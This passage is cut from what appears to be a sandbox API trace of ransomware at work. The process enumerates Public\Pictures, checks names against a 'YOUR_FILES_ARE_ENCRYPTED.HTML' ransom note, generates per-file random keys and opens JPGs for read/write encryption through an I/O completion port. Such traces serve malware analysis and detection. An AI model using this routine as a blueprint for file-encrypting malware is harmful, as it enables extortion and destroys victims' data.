ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Pictures", cAlternateFileName="")) returned 1 [0171.602] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures") returned 28 [0171.602] GetProcessHeap () returned 0x270000 [0171.602] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0171.603] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\Public\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures" [0171.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\*" [0171.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.603] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.603] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | 
out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b38bbf8, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3b1d58, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.603] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0171.603] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.603] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.603] lstrlenW (lpString=".ini") returned 4 [0171.603] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.603] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0171.603] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures") returned 44 [0171.603] GetProcessHeap () returned 0x270000 [0171.603] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.603] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures" [0171.603] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*" [0171.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.634] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.634] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d07da2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x0, dwReserved1=0x60, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0171.634] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") 
returned 62 [0171.634] lstrcmpW (lpString1="Chrysanthemum.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.634] PathFindExtensionW (pszPath="Chrysanthemum.jpg") returned=".jpg" [0171.634] lstrlenW (lpString=".jpg") returned 4 [0171.635] PathFindExtensionW (pszPath="Chrysanthemum.jpg") returned=".jpg" [0171.635] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0171.635] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=879394) returned 1 [0171.635] GetProcessHeap () returned 0x270000 [0171.635] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0171.637] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="D6") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="92") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="B6") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="E2") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="E2") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="C9") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="5E") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="4F") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="5A") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A4") returned 2 [0171.637] wsprintfW (in: 
param_1=0x4ebda5e, param_2="%02X" | out: param_1="BF") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="A6") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7F") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="B9") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1D") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="97") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="25") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="58") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="66") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="14") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="38") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="8F") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F6") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="91") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="89") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="D9") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="6E") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E9") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="04") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A6") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="05") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="58") returned 2 
[0171.638] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" [0171.638] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.638] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0171.638] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0x0, dwReserved1=0x60, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0171.638] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0171.638] lstrcmpW (lpString1="Desert.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.638] PathFindExtensionW (pszPath="Desert.jpg") returned=".jpg" [0171.639] lstrlenW (lpString=".jpg") returned 4 [0171.639] PathFindExtensionW (pszPath="Desert.jpg") returned=".jpg" [0171.639] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0171.639] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=845941) returned 1 [0171.639] GetProcessHeap () returned 0x270000 [0171.639] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78c1008 [0171.643] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="53") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3A") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="44") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="8C") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="38") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="90") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="A9") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C9") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="04") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="60") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="73") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="54") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="82") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="51") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B7") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="8B") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="51") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="46") returned 2 [0171.644] wsprintfW 
(in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="F7") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AB") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="EE") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="7D") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="82") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E3") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="7A") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="20") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="43") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A1") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="6C") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="F1") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="AB") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="69") returned 2 [0171.645] lstrcpyW (in: lpString1=0x78d10bc, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" [0171.645] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x78c1008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.645] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78c1008, lpOverlapped=0x78c1008) returned 1 [0171.645] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x26, 
ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.645] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0171.645] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.645] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.645] lstrlenW (lpString=".ini") returned 4 [0171.645] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.645] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0x0, dwReserved1=0x60, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0171.645] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0171.645] lstrcmpW (lpString1="Hydrangeas.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.645] PathFindExtensionW (pszPath="Hydrangeas.jpg") returned=".jpg" [0171.645] lstrlenW (lpString=".jpg") returned 4 [0171.645] PathFindExtensionW (pszPath="Hydrangeas.jpg") returned=".jpg" [0171.645] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.645] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0171.648] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=595284) returned 1 [0171.648] GetProcessHeap () returned 0x270000 [0171.648] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78e9160 [0171.650] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="D2") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="BC") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="FC") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B9") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="90") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="3C") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="6E") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="CF") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="75") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="C4") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="48") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="64") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="22") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="2A") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="4B") returned 2 [0171.650] wsprintfW (in: 
param_1=0x4ebda72, param_2="%02X" | out: param_1="CB") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="EE") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="77") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="ED") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="D5") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="2E") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="D9") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="BA") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="8D") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="F2") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="6B") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="3E") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="B5") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="8A") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D9") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="F9") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="34") returned 2 [0171.651] lstrcpyW (in: lpString1=0x78f9214, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" [0171.651] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x78e9160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.651] 
PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78e9160, lpOverlapped=0x78e9160) returned 1 [0171.651] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0x0, dwReserved1=0x60, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0171.652] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0171.652] lstrcmpW (lpString1="Jellyfish.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.652] PathFindExtensionW (pszPath="Jellyfish.jpg") returned=".jpg" [0171.652] lstrlenW (lpString=".jpg") returned 4 [0171.652] PathFindExtensionW (pszPath="Jellyfish.jpg") returned=".jpg" [0171.652] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0171.654] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=775702) returned 1 [0171.654] GetProcessHeap () returned 0x270000 [0171.654] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76b8ef8 [0171.662] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="FC") returned 2 [0171.662] wsprintfW (in: 
param_1=0x4ebda3a, param_2="%02X" | out: param_1="1B") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D1") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="11") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="C7") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="1A") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="8B") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="1F") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0B") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="71") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C3") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="86") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="CC") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="3E") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="F3") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5B") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="50") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="C2") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="A1") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="B2") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="6A") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="24") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: 